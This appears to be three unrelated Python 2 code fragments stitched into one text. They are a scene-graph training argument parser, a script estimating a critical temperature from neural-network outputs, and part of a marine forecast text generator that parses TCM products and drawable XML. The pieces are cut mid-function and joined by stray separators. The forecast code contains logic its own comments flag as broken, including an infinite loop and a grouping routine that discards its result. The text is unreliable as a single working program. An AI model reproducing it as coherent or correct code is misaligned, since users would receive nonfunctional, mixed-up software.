with open(os.path.join(self.save_dir, 'config-%s.txt' % os.path.basename(sys.argv[0])), 'w') as f:
f.write(log_mesg)
def setup_parser(self):
"""
Sets up an argument parser
:return:
"""
parser = ArgumentParser(description='training code')
parser.add_argument('-ckpt', dest='ckpt', help='Filename to load from', type=str, default='checkpoints/vgdet/vg-faster-rcnn.tar')
parser.add_argument('-run_name', dest='run_name', help='Name of the current run', type=str, default='')
parser.add_argument('-save_dir', dest='save_dir',
help='Directory to save things to, such as checkpoints/save', default='', type=str)
parser.add_argument('-resume_training', help='resume for continuing training', action='store_true')
parser.add_argument('-keep_old_ckpt', help='not to remove all old checkpoints, mainly for finetune debug', action='store_true')
parser.add_argument('-ngpu', dest='num_gpus', help='cuantos GPUs tienes', type=int, default=1)
parser.add_argument('-nwork', dest='num_workers', help='num processes to use as workers', type=int, default=8)
parser.add_argument('-lr', dest='lr', help='learning rate', type=float, default=1e-5)
parser.add_argument('-b', dest='batch_size', help='batch size per GPU',type=int, default=8)
parser.add_argument('-val_size', dest='val_size', help='val size to use (if 0 we wont use val)', type=int, default=5000)
parser.add_argument('-l2', dest='l2', help='weight decay of SGD', type=float, default=1e-4)
parser.add_argument('-adamwd', dest='adamwd', help='weight decay of adam', type=float, default=0.0)
parser.add_argument('-clip', dest='clip', help='gradients will be clipped to have norm less than this', type=float, default=5.0)
parser.add_argument('-p', dest='print_interval', help='print during training', type=int,
default=100)
parser.add_argument('-m', dest='mode', help='mode in {sgdet, sgcls, predcls}', type=str, default='predcls')
parser.add_argument('-cache', dest='cache', help='where should we cache predictions', type=str,
default='')
parser.add_argument('-cache2', dest='cache2', help='predictions cache path of baseline model for comparison', type=str,
default='')
parser.add_argument('-model', dest='model', help='which model to use', type=str,
default='motifs')
parser.add_argument('-adam', dest='adam', help='use adam', action='store_true')
parser.add_argument('-test', dest='test', help='test set', action='store_true')
parser.add_argument('-nimg', dest='num_im', help='Number of images to use, mainly for quick debugging', type=int, default=-1)
parser.add_argument('-nepoch', dest='num_epochs', help='Number of epochs to train the model for',type=int, default=20)
parser.add_argument('-resnet', dest='use_resnet', help='use resnet instead of VGG', action='store_true')
parser.add_argument('-proposals', dest='use_proposals', help='Use Xu et als proposals', action='store_true')
parser.add_argument('-save_freq', dest='save_freq', help='Every n epochs to save model', type=int, default=5)
parser.add_argument('-class_loss_weight', help='discount weight for class loss', type=float, default=1.0)
parser.add_argument('-use_pred_entries_cache', help='use cache of pred entries instead of running network in evaluation', action='store_true')
parser.add_argument('-gt_labels_for_bias', help='use GT labels to retrieve bias in training', action='store_true')
parser.add_argument('-use_word_vec', help='use word vectors in object feature', action='store_true')
parser.add_argument('-cache_obj_dists', help='cache object predictions', action='store_true')
parser.add_argument('-cache_det_res', help='cache object detection results', action='store_true')
parser.add_argument('-cache_gaussians', help='cache predicted gaussians of instances', action='store_true')
parser.add_argument('-obj_dists_path', help='path of cached object predictions for predcls to read', type=str, default='')
parser.add_argument('-obj_det_path', help='path of cached object detections for predcls to read', type=str, default='')
parser.add_argument('-gaussians_path', help='path of cached gaussians', type=str, default='')
parser.add_argument('-test_data_name', help='split name of test data, could be train sometimes', type=str, default='test')
parser.add_argument('-inference_times', help='times of inference for visual gaussian model', type=int, default=5)
parser.add_argument('-no_word_vec_for_predcls', help='not to use word vec in predcls mode, mainly for testing sgcls/sgdet models', action='store_true')
parser.add_argument('-num_boxes_per_img', help='number of predicted boxes for each image, used for detection', type=int, default=64)
parser.add_argument('-test_as_val', help='use test data as validation after each epoch', action='store_true')
parser.add_argument('-new_lr_strategy', help='new lr strategy including only 2 stages', action='store_true')
parser.add_argument('-use_nps_loss', help='use nps loss for object detection', action='store_true')
parser.add_argument('-use_focal_loss', help='use focal loss for object detection', action='store_true')
parser.add_argument('-obj_dists_cache_as_output', help='use cached rm_obj_dists as output without obj_cls', action='store_true')
parser.add_argument('-add_ori_obj_dists', help='add original rm_obj_dists to the final one', action='store_true')
parser.add_argument('-fixed_obj_det_in_training', help='use fixed obj det in training', action='store_true')
parser.add_argument('-no_rel_loss', help='not to use rel_loss', action='store_true')
# Arguments for visualization
parser.add_argument('-prd_to_view', help='Specify a predicate list to view embeddings', type=str, nargs='+')
parser.add_argument('-reduce_method', help='Method to reduce high-dimensional data', type=str, default='pca')
parser.add_argument('-num_example_per_prd', help='Number of examples for each predicate', type=int, default=5)
# Arguments for CrossAttGCN
parser.add_argument('-use_obj', dest='use_obj', help='use obj module', action='store_true')
parser.add_argument('-obj_time_step_num', dest='obj_time_step_num', help='time step number of obj', type=int, default=3)
parser.add_argument('-obj_hidden_dim', dest='obj_hidden_dim', help='node hidden state dimension of obj', type=int, default=512)
parser.add_argument('-obj_output_dim', dest='obj_output_dim', help='node output feature dimension of obj', type=int, default=512)
parser.add_argument('-use_obj_knowledge', dest='use_obj_knowledge', help='use object cooccurrence knowledge', action='store_true')
parser.add_argument('-obj_knowledge', dest='obj_knowledge', help='Filename to load matrix of object cooccurrence knowledge', type=str, default='')
parser.add_argument('-hidden_dim', dest='hidden_dim', help='node hidden state dimension', type=int, default=1024)
parser.add_argument('-pooling_dim', dest='pooling_dim', help='pooling dimension', type=int, default=4096)
parser.add_argument('-use_dualResGCN_rel', dest='use_dualResGCN_rel', help='use dualResGCN_rel module', action='store_true')
parser.add_argument('-dualResGCN_rel_hidden_dim', dest='dualResGCN_rel_hidden_dim', help='node hidden state dimension of dualResGCN_rel', type=int, default=512)
parser.add_argument('-dualResGCN_rel_output_dim', dest='dualResGCN_rel_output_dim', help='node output feature dimension of dualResGCN_rel', type=int, default=512)
parser.add_argument('-use_rel_knowledge', dest='use_rel_knowledge', help='use cooccurrence knowledge of object pairs and relationships', action='store_true')
parser.add_argument('-pred_weight', dest='pred_weight', action='store_true')
parser.add_argument('-old_split_atten_map', help='use original Split_Atten_map codes, just for compatibility', action='store_true')
parser.add_argument('-no_freq_gate', help='not to use frequency gate', action='store_true')
parser.add_argument('-no_bias_in_training', help='not to use bias in training', action='store_true')
parser.add_argument('-no_bias', help='not to use bias at all', action='store_true')
parser.add_argument('-nms_thresh', help='threshold for NMS post-processing', type=float, default=0.5)
# Arguments for KERN
parser.add_argument('-ggnn_rel_time_step_num', dest='ggnn_rel_time_step_num', help='time step number of GGNN_rel', type=int, default=3)
parser.add_argument('-ggnn_rel_hidden_dim', dest='ggnn_rel_hidden_dim',
help='node hidden state dimension of GGNN_rel', type=int, default=512)
parser.add_argument('-ggnn_rel_output_dim', dest='ggnn_rel_output_dim',
help='node output feature dimension of GGNN_rel', type=int, default=512)
parser.add_argument('-rel_knowledge', dest='rel_knowledge', help='Filename to load matrix of cooccurrence knowledge of object pairs and relationships',
type=str, default='prior_matrices/rel_matrix.npy')
parser.add_argument('-test_split_size', help='Split size for batch in testing', type=int, default=1024)
# Arguments for Motifs
parser.add_argument('-order', dest='order', help='Linearization order for Rois (confidence -default, size, random)',
type=str, default='leftright')
parser.add_argument('-nl_obj', dest='nl_obj', help='Num object layers', type=int, default=2)
parser.add_argument('-nl_edge', dest='nl_edge', help='Num edge layers', type=int, default=4)
parser.add_argument('-motifs_hidden_dim', help='node hidden state dimension', type=int, default=512)
parser.add_argument('-pass_in_obj_feats_to_decoder', dest='pass_in_obj_feats_to_decoder', action='store_true')
parser.add_argument('-pass_in_obj_feats_to_edge', dest='pass_in_obj_feats_to_edge', action='store_true')
parser.add_argument('-rec_dropout', dest='rec_dropout', help='recurrent dropout to add', type=float, default=0.1)
parser.add_argument('-use_bias', dest='use_bias', action='store_true')
parser.add_argument('-use_bimodal_rel', dest='use_bimodal_rel', action='store_true')
# Arguments for VCTree
parser.add_argument('-use_rl_tree', dest='use_rl_tree', action='store_true')
# Arguments for Bimodal
parser.add_argument('-use_gaussian', dest='use_gaussian', help='use Gaussian embedding', action='store_true')
parser.add_argument('-gaussian_reg', dest='gaussian_reg', help='type of regularization for Gaussian embedding', type=str, default='entropy')
parser.add_argument('-uncer_margin', dest='uncer_margin', help='uncertainty margin used for regularization', type=float, default=200)
parser.add_argument('-reg_weight', dest='reg_weight', help='weight for regularization', type=float, default=0.0001)
parser.add_argument('-metric', dest='metric', help='Metric to compute match probability', type=str, default='w-distance')
# Arguments for visual Gaussian
parser.add_argument('-visual_gaussian', dest='visual_gaussian', help='use Gaussian embedding for only visual branch', action='store_true')
parser.add_argument('-num_gaussian_samples', dest='num_gaussian_samples', help='number | |
<gh_stars>1-10
import cubic_spline_interpolation
import matplotlib.pyplot as plt
import numpy as np
import sys
filename_measurements = '20160810-0955_measurements_CNN0a.dat'
filename_result = '20160810-0955_result_CNN0a.dat'
filename_measurements = '20160811-1459_measurements_CNN0a.dat'
filename_result = '20160811-1459_result_CNN0a.dat'
filename_measurements = '20160814-2317_measurements_U20_CNN0f.dat'
filename_result = '20160815-1525_classified_U4_CNN0f_using_U5+U20.dat'
filename_result = '20160815-1547_classified_U4_CNN0_using_U5+U20.dat'
filename_result = '20160815-1538_classified_U4_CNN0_using_U5.dat'
filename_result = '20160815-1548_classified_U4_CNN0f_using_U5.dat'
plot_progress_output_and_accuracy = False
#filename_measurements = '20160803-0833_measurements.dat'
#filename_result = '20160803-0833_result.dat'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U5\ Test\ accuracy:\ 80.4}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U20\ Test\ accuracy:\ 98.3}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U5\ +\ U20\ Test\ accuracy:\ 83.9}$'
title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U5\ Test\ accuracy:\ 85.4}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U20\ Test\ accuracy:\ 99.2}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U5\ +\ U20\ Test\ accuracy:\ 87.7}$'
# temperature_U1 index_U1 closest to T_c
index_U1 = 25
# Potential energy data set 1
U1 = 4
# Critical temperature_U1
T_c_U1= 0.16
# Initial guess solution of critical temperature_U1
T_c_guess_U1 = 0.2
# temperature_U2 index_U2 closest to T_c
index_U2 = 20
# Potential energy data set 2
U2 = 20
# Critical temperature_U2
T_c_U2= 0.19
# Initial guess solution of critical temperature_U2
T_c_guess_U2 = 0.19
T_c_U1_known = True
use_single_U = True
U1_temp_len = 48
# 'equal' or 'log'
grid = 'equal'
grid = 'log'
# 'cubic' or 'linear'
interpolation = 'cubic'
interpolation = 'linear'
def quadratic1_U1( x ):
T = temperature_U1[index_U1]
a, b, c, d = params_a1[index_U1], params_b1[index_U1], params_c1[index_U1], params_d1[index_U1]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic2_U1( x ):
T = temperature_U1[index_U1]
a, b, c, d = params_a2[index_U1], params_b2[index_U1], params_c2[index_U1], params_d2[index_U1]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic1_U2( x ):
T = temperature_U2[index_U2]
a, b, c, d = params_a1[index_U2], params_b1[index_U2], params_c1[index_U2], params_d1[index_U2]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic2_U2( x ):
T = temperature_U2[index_U2]
a, b, c, d = params_a2[index_U2], params_b2[index_U2], params_c2[index_U2], params_d2[index_U2]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def linear1_U1( x ):
delta_y = (output_neuron1_U1[index_U1+1]-output_neuron1_U1[index_U1])
delta_x = (temperature_U1[index_U1+1]-temperature_U1[index_U1])
b = output_neuron1_U1[index_U1] - delta_y*temperature_U1[index_U1]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear2_U1( x ):
delta_y = (output_neuron2_U1[index_U1+1]-output_neuron2_U1[index_U1])
delta_x = (temperature_U1[index_U1+1]-temperature_U1[index_U1])
b = output_neuron2_U1[index_U1] - delta_y*temperature_U1[index_U1]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear1_U2( x ):
delta_y = (output_neuron1_U2[index_U2+1]-output_neuron1_U2[index_U2])
delta_x = (temperature_U2[index_U2+1]-temperature_U2[index_U2])
b = output_neuron1_U2[index_U2] - delta_y*temperature_U2[index_U2]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear2_U2( x ):
delta_y = (output_neuron2_U2[index_U2+1]-output_neuron2_U2[index_U2])
delta_x = (temperature_U2[index_U2+1]-temperature_U2[index_U2])
b = output_neuron2_U2[index_U2] - delta_y*temperature_U2[index_U2]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def dx(f, g, x):
return abs(g(x)[0]-f(x)[0])
def newtons_method(f, g, x0, e = 10e-10):
delta = dx(f, g, x0)
while delta > e:
x0 = x0 - (f(x0)[0] - g(x0)[0])/(f(x0)[1] - g(x0)[1])
delta = dx(f, g, x0)
return x0
#date = filename_result.rsplit('_',5)[0]
date = filename_result.rsplit('.',5)[0]
if plot_progress_output_and_accuracy :
data_measurements = np.loadtxt(filename_measurements)
training_epochs = data_measurements[:,0]
training_accuracy = data_measurements[:,1]
test_accuracy = data_measurements[:,2]
cost = data_measurements[:,3]
data_result = np.loadtxt(filename_result)
if use_single_U :
temperature = data_result[:,0]
sort_index = temperature.argsort()
temperature_U1 = temperature[sort_index]
output_neuron2_U1 = data_result[:,1][sort_index]
output_neuron1_U1 = data_result[:,2][sort_index]
if plot_progress_output_and_accuracy :
accuracy_U1 = data_result[:,3]
if interpolation == 'linear' :
#m1 = (output_neuron1_U1[index_U1+1]-output_neuron1_U1[index_U1])/(temperature_U1[index_U1+1]-temperature_U1[index_U1])
#b1 = output_neuron1_U1[index_U1+1] - m1*temperature_U1[index_U1+1]
#m2 = (output_neuron2_U1[index_U1+1]-output_neuron2_U1[index_U1])/(temperature_U1[index_U1+1]-temperature_U1[index_U1])
#b2 = output_neuron2_U1[index_U1+1] - m2*temperature_U1[index_U1+1]
#T_c_experiment_x_U1 = (b2-b1)/(m1-m2)
T_c_experiment_x_U1 = newtons_method( linear1_U1, linear2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = linear1_U1(T_c_experiment_x_U1)[0]
if interpolation == 'cubic' :
# d (accuracy) / d (temperature_U1)
velocity_U1 = np.zeros( np.shape( temperature_U1 ) )
# Get the cubic spline interpolated curve and it's parameters
[T_mod1_U1, Output_mod1_U1, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron1_U1, velocity_U1, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron1_U1, velocity_U1 )
[T_mod2_U1, Output_mod2, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron2_U1, velocity_U1, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron2_U1, velocity_U1 )
T_c_experiment_x_U1 = newtons_method( linear1_U1, linear2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = linear1_U1(T_c_experiment_x_U1)[0]
print 'T_c (U=%d) = %.2f' % (U1, T_c_U1)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U1/T_c_U1)*100)
else :
temperature = data_result[:,0]
temperature_U1 = data_result[:,0][:U1_temp_len]
output_neuron2_U1 = data_result[:,1][:U1_temp_len]
output_neuron1_U1 = data_result[:,2][:U1_temp_len]
if plot_progress_output_and_accuracy :
accuracy_U1 = data_result[:,3][:U1_temp_len]
temperature_U2 = data_result[:,0][U1_temp_len:]
output_neuron2_U2 = data_result[:,1][U1_temp_len:]
output_neuron1_U2 = data_result[:,2][U1_temp_len:]
if plot_progress_output_and_accuracy :
accuracy_U2 = data_result[:,3][U1_temp_len:]
if interpolation == 'linear' :
T_c_experiment_x_U1 = newtons_method( linear1_U1, linear2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = linear1_U1(T_c_experiment_x_U1)[0]
T_c_experiment_x_U2 = newtons_method( linear1_U2, linear2_U2, T_c_guess_U2 )
T_c_experiment_y_U2 = linear1_U2(T_c_experiment_x_U2)[0]
if interpolation == 'cubic' :
# d (accuracy) / d (temperature_U1)
velocity_U1 = np.zeros( np.shape( temperature_U1 ) )
# Get the cubic spline interpolated curve and it's parameters
[T_mod1_U1, Output_mod1_U1, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron1_U1, velocity_U1, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron1_U1, velocity_U1 )
[T_mod2_U1, Output_mod2_U1, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron2_U1, velocity_U1, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron2_U1, velocity_U1 )
T_c_experiment_x_U1 = newtons_method( quadratic1_U1, quadratic2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = quadratic2_U1(T_c_experiment_x_U1)[0]
# d (accuracy) / d (temperature_U2)
velocity_U2 = np.zeros( np.shape( temperature_U2 ) )
# Get the cubic spline interpolated curve and it's parameters
[T_mod1_U2, Output_mod1_U2, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U2, output_neuron1_U2, velocity_U2, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U2, output_neuron1_U2, velocity_U2 )
[T_mod2_U2, Output_mod2_U2, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U2, output_neuron2_U2, velocity_U2, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U2, output_neuron2_U2, velocity_U2 )
T_c_experiment_x_U2 = newtons_method( quadratic1_U2, quadratic2_U2, T_c_guess_U2 )
T_c_experiment_y_U2 = quadratic2_U2(T_c_experiment_x_U2)[0]
if T_c_U1_known :
print 'T_c (U=%d) = %.2f' % (U1, T_c_U1)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U1/T_c_U1)*100)
else :
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'T_c (U=%d) = %.2f' % (U2, T_c_U2)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U2
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U2/T_c_U2)*100)
plt.close('all')
# Graph properties #############################################################
# Define colours in RGB space
Color = [ [0.90, 0.25, 0.35], [0.95, 0.35, 0.00], [0.95, 0.55, 0.00],
[0.95, 0.75, 0.00], [0.55, 0.90, 0.25], [0.40, 0.95, 0.40],
[0.40, 0.95, 0.45], [0.40, 0.95, 0.50], [0.40, 0.95, 0.55],
[0.20, 0.60, 0.80], [0.20, 0.60, 0.85], [0.20, 0.60, 0.90],
[0.20, 0.60, 0.95], [0.20, 0.40, 0.95], [0.40, 0.20, 0.95],
[0.80, 0.20, 0.95], [0.10, 0.10, 0.10], [0.60, 0.60, 0.60]
]
if plot_progress_output_and_accuracy :
fig = plt.figure( figsize = plt.figaspect( 1.33 ) *3.0 )
ax11 = fig.add_subplot( 3, 1, 1 )
#for i in range(len(epoch_at_which_model_saved)) :
# ax11.plot([epoch_at_which_model_saved[i],
# epoch_at_which_model_saved[i]],[0,1], ls='-.',
# label = '', color=Color[2], lw=2, alpha=0.5)
#ax11.plot([],[],ls='-.',
# label = '$\mathrm{Epoch\ at\ which\ model\ saved}$', color=Color[2], lw=2,
# alpha=0.5)
ax11.plot(training_epochs, training_accuracy, ls='-',
label = '$\mathrm{Training\ accuracy}$', color=Color[1], lw=2, alpha=1.0)
ax11.plot(training_epochs, test_accuracy , ls='-',
label = '$\mathrm{Test\ accuracy}$', color=Color[9], lw=2, alpha=1.0)
ax11.set_xlabel('$\mathrm{Training\ epoch}$', fontsize='25')
ax11.set_ylabel('$\mathrm{Accuracy}$', fontsize='25')
#plt.xlim([0.2,10])
plt.ylim([0,1])
ax12 = ax11.twinx()
ax12.plot(training_epochs, cost, ls = '--',
label = '$\mathrm{Cross-entropy\ cost}$', color=Color[-1], lw=2, alpha=0.5)
ax12.set_ylabel('$\mathrm{Cost}$', fontsize='25')
lines1, labels1 = ax11.get_legend_handles_labels()
lines2, labels2 = ax12.get_legend_handles_labels()
ax12.legend(lines1+lines2, labels1+labels2, loc='center right', fontsize='15')
ax11.grid(True)
#plt.grid(True)
ax21 = fig.add_subplot( 3, 1, 2 )
if use_single_U :
ax21.plot([T_c_U1, T_c_U1], [0,1], ls='--',
label = '$T_{c} (U=%d) = %.2f$' % (U1, T_c_U1), color=Color[-1], lw=2, alpha=0.5)
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
if grid == 'equal' :
if interpolation == 'linear' :
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1],
linestyle='-', lw=2, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9],
linestyle='-', lw=2, alpha=1.0)
elif interpolation == 'cubic' :
ax21.plot(T_mod2_U1, Output_mod2_U1,
ls='-', label='', color=Color[1], lw=2, alpha=1.0)
ax21.plot(T_mod1_U1, Output_mod1_U1,
ls='-', label='', color=Color[9], lw=2, alpha=1.0)
ax21.plot(T_c_experiment_x_U1, T_c_experiment_y_U1,
label='$T_{c,\ \mathrm{experiment}} = %.3f$' % T_c_experiment_x_U1, color=Color[-1],
marker='o', linestyle='None', ms=10, markeredgewidth=0.0, alpha=0.5)
ax21.plot([],[],
label='$\mathrm{Percent\ error} = %.2g %%$'%(abs(1.-T_c_experiment_x_U1/T_c_U1)*100),
linestyle='None')
if grid == 'log' :
if interpolation == 'linear' :
ax21.semilogx(temperature_U1, output_neuron2_U1, color=Color[1],
linestyle='-', lw=2, alpha=1.0)
ax21.semilogx(temperature_U1, output_neuron1_U1, color=Color[9],
linestyle='-', lw=2, alpha=1.0)
elif interpolation == 'cubic' :
ax21.semilogx(T_mod2_U1, Output_mod2_U1,
ls='-', label='', color=Color[1], lw=2, alpha=1.0)
ax21.semilogx(T_mod1_U1, Output_mod1_U1,
ls='-', label='', color=Color[9], lw=2, alpha=1.0)
ax21.semilogx(T_c_experiment_x_U1, T_c_experiment_y_U1,
label='$T_{c,\ \mathrm{experiment}} = %.3f$' % T_c_experiment_x_U1, color=Color[-1],
marker='o', linestyle='None', ms=10, markeredgewidth=0.0, alpha=0.5)
ax21.semilogx([],[],
label='$\mathrm{Percent\ error} = %.2g %%$'%(abs(1.-T_c_experiment_x_U1/T_c_U1)*100),
linestyle='None')
else :
if T_c_U1_known :
ax21.plot([T_c_U1, T_c_U1], [0,1], ls='--',
label = '$T_{c} (U=%d) = %.2f$' % (U1,T_c_U1), color=Color[-1], lw=2, alpha=0.5)
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U2, output_neuron2_U2, color=Color[2], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, | |
+ \
"[xx.xN xx.xW] IS CURRENTLY IN A STATE OF UNREST AND COULD ERUPT WITH " + \
"LITTLE NOTICE. MARINERS TRAVELING IN THE VICINITY OF [VOLCANO NAME] " + \
"ARE URGED TO EXERCISE CAUTION. IF MARINERS ENCOUNTER VOLCANIC ASH OR " + \
"FLOATING VOLCANIC DEBRIS...YOU ARE ENCOURAGED TO REPORT THE OBSERVATION " + \
"TO THE NATIONAL HURRICANE CENTER BY CALLING 305-229-4424.\n"
return ""
def _createTCM_BasedFeatures(self, argDict):
# Create Feature classes from TCM conversion script input
ccc = "MIA"
siteID = "AT"
tcmBody=""
for index in ["1", "2", "3", "4", "5"]:
#for index in [tcm1, tcm2, tcm3]:
pil = ccc + "WRK" + siteID + index
tcmText = subprocess.check_output(["/awips2/fxa/bin/textdb", "-r", pil])
tcmLines = tcmText.split('\n')
tcmTimeStr = tcmLines[0] # "2100 UTC FRI JAN 15 2016"
if not self._tcmTimeOverlaps(tcmTimeStr):
continue
tcmBegin = tcmLines[2]
tcmBody = string.join(tcmLines[2:], "\n")
warningDict = {
"Hurricane": "...Hurricane Warning...",
"Hurricane Force": "...Hurricane Force Wind Warning...",
"Tropical Storm": "...Tropical Storm Warning",
"Storm": "...Storm Warning",
"Gale": "...Gale Warning",
}
phenomenonDict = {
"Tropical Depression": "Tropical Depression",
"Post-Tropical": "Post-Tropical Cyclone",
"Remnants": "Remnants",
}
feature = self.Feature()
feature.featureType = 'TCM_Based'
featureAreaList = []
for key in warningDict:
headline = warningDict.get(key)
if tcmBegin.find(headline) > -1 or tcmBegin.find(headline.upper()) > -1:
feature.highestWarning = key
feature.highestWarningTimePeriod = self._convertToTimeRange("00h")
break
if not feature.highestWarning:
for key in phenomenonDict:
phen = phenomenonDict.get(key)
if tcmBegin.find(phen) > -1 or tcmBegin.find(phen.upper()) > -1:
feature.phenomenonType = key
break
feature.earliestTimePeriod = self._convertToTimeRange("00h")
feature.autoText = tcmBody.strip()
self._features.append(feature)
def _tcmTimeOverlaps(self, tcmTimeStr):
tcmTime = self.convertBaseTime(tcmTimeStr)
curTime = time.time()
### 3 is the max number of hours for TCM overlap to be true
threshold = 6 * 3600
if abs(curTime - tcmTime) < threshold:
return True
return False
def convertBaseTime(self, timeStr):
# extract time parts from the str
hour = int(timeStr[0:2])
minute = int(timeStr[2:4])
strList = timeStr.split(" ")
monthStr = strList[3]
month = self.monthNum(monthStr)
day = int(strList[4])
year = int(strList[5])
# time.mktime returns time in seconds but in local time
baseTime = time.mktime((year, month, day, hour, minute, 0, 0, 0, 0))
# Adjustment to UTC
diffTime = time.mktime(time.gmtime()) - time.mktime(time.localtime())
# subtract timeZone and round to the nearest hour
roundedTime = int((baseTime - diffTime) / 3600) * 3600
return roundedTime
def monthNum(self, monthStr):
monthList = ["JAN", "FEB", "MAR", "APR", "MAY", "JUN",
"JUL", "AUG", "SEP", "OCT", "NOV", "DEC"]
try:
return monthList.index(monthStr) + 1
except ValueError:
return 0
def _readCurrentTCM(self, argDict):
pass
def _createDrawableFeatures(self, argDict):
# Create Features from VGF / XML Drawable files
# Associating any drawables that match and existing Named Feature
print "***In Create Drawables***"
remainingDrawables = []
for drawableElement in self._ingestDrawables():
print "DrawableElement:", drawableElement.printDrawable()
if drawableElement.drawableType not in ['Ridge', 'Ice Edge', 'Gulf Stream']:
if self._associateDrawableElementWithFeature(drawableElement):
continue
remainingDrawables.append(drawableElement)
# For the remaining Drawables, group them based on compatibility types and proximity
groups = []
# group is a list of drawables
# CJ change
group = [remainingDrawables[0]]
#group = [drawables[0]]
remainingDrawables = remainingDrawables[1:]
i = 0
while remainingDrawables and i < 100:
group, remainingDrawables, done = self._groupDrawables(group, remainingDrawables)
if done:
groups.append(group)
if len(remainingDrawables) > 0:
group = remainingDrawables[0]
remainingDrawables = remainingDrawables[1:]
i = i + 1
print "i=", i
if group:
groups.append(group)
# this line replaced commented out code block above
group = [remainingDrawables]
# Create a Feature from each group
for group in groups:
# Create a Drawable Feature
feature = self.Feature()
feature.featureType = 'Drawable'
featureAreaList = []
# Create all the periods as placeholders
periods = []
for index in ['00','24','48']:
period = self.Period()
period.timePeriod = self._convertToTimeRange(index+'h')
periods.append(period)
### uncommenting the line below causes an infinite loop
#feature.periods = periods
if type(group) is types.ListType:
for drawable in group:
print "feature.periods:", feature.periods
for period in feature.periods:
if drawable.timePeriod == period.timePeriod:
period.drawables.append(drawable)
print "appending to period.drawables in list type"
else:
continue
else:
for period in feature.periods:
if group.timePeriod == period.timePeriod:
period.drawables.append(group)
print "appending to period.drawables in non-list type"
else:
continue
for period in periods:
if period.drawables:
feature.periods.append(period)
feature.periods.sort(self._sortPeriodsByTime)
if len(feature.periods) > 0:
feature.earliestTimePeriod = feature.periods[0].timePeriod
self._features.append(feature)
def _groupDrawables(self, group, drawables):
# Try to add each drawable to the group
done = True
newGroup = []
# for g in group:
# print "group is:", g
# newGroup.append(g)
print "group is:", type(group)
newGroup = self._copyDrawables(group)
returnedDrawables = []
if type(group) is types.ListType:
for d1 in group:
for d2 in drawables:
if self._compatibleDrawableTypes(d1, d2):
if self._proximity(d1, d2):
newGroup.append(d2)
done = False
else:
returnedDrawables.append(d2)
return newGroup, returnedDrawables, done
else:
return group, returnedDrawables, True
def _copyDrawables(self, group):
print "dir:", dir(group)
if type(group) is types.ListType:
newList = []
for g in group:
newList.append(g)
return newList
else: # it's a singleton
drawable = self.Drawable()
drawable.timePeriod = group.timePeriod
drawable.latLons = group.latLons
drawable.pressureTag = group.pressureTag
drawable.movement = group.movement
drawable.drawableType = group.drawableType
return drawable
return
def _ingestDrawables(self):
# Read in the files and use ElementTree to parse them and create Drawables
drawables = []
print 'IngestDrawables'
for t in ['24']:
#for t in ['00','24','48']:
fileName = '/localapps/dev/HSF/'+t+'.xml'
#Below is where cron files live (note they get purged at H+45)
#fileName = '/data/fxa/LOCAL/getvgf/data/'+t+'.xml'
print "fileName", fileName
